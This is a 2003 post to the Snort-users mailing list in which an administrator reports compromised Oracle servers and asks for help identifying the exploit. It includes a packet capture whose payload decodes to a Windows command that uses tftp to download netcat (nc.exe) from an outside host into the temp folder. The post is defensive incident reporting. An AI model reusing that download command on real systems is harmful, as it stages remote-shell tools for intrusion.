[Snort-users] Oracle Compromise (Tftp + Netcat)

Dusty Hall halljer at ...8709...
Wed Apr 16 06:59:08 EDT 2003


Several of our Oracle systems were compromised last week and  I'm
curious to know if anyone else has been hit with this attack or could
point me to the exploit information.  I'm guessing its "CERT Advisory
CA-2003-05" but I'm not 100% sure.  Any advise would be greatly
appreciated.

Here's the payload (post comprimise):

03:47:59.280516 <SOMEOTHERHOST>.4804 > <OURHOST>.1181: P
2735894114:2735894200(86) ack 1993726960 win 64208 (DF)
0x0000   4500 007e 6450 4000 7206 ca2e 3ea3 d5c5       
E..~dP at ...8899...>...
0x0010   83cc 41c6 12c4 049d a312 6e62 76d5 dbf0       
..A.......nbv...
0x0020   5018 fad0 1aa0 0000 0056 0000 0600 0000       
P........V......
0x0030   0000 07fe 4063 6d64 202f 6320 7466 7470       
.... at ...8900.../c.tftp
0x0040   202d 6920 3632 2e31 3633 2e32 3133 2e31       
.-i.XX.XXX.213.1
0x0050   3937 2067 6574 2077 696e 646f 7773 2f6e       
97.get.windows/n
0x0060   6574 6361 742f 6e63 2e65 7865 2025 7465       
etcat/nc.exe.%te
0x0070   6d70 255c 6e05 632e 6578 6500 0131             mp%\n.c.exe..1

Thanks,

-Dusty




More information about the Snort-users mailing list